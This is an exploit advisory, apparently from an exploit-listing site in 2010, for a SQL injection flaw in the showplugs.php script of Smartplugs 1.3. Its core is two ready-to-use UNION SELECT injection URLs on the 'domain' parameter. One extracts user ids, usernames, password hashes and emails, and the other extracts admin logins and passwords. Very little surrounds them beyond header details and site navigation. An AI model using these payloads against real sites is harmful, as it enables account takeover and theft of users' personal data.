Smartplugs 1.3 (showplugs.php) SQL Injection Vulnerability

Posted on 03 March 2010

==========================================================
Smartplugs 1.3 (showplugs.php) SQL Injection Vulnerability
==========================================================

----------------------------Information------------------------------------------------
+Name : smartplugs 1.3 SQL Injection showplugs.php
+Autor : Easy Laster
+Date   : 03.03.2010
+Script  : smartplugs 1.3  http://www.smart-plugs.com/spv1/
+Download : -------------
+Price : 170$
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/smartplugs/showplugs.php?domain=
 
+Exploitable users  : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select
+1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6+from+user--+
 
Exploitable admin : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+
select+1,concat(username,0x3a,password),3,4,5,6+from+logins--+
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

None in database

Last 20

Exploits :

Last 20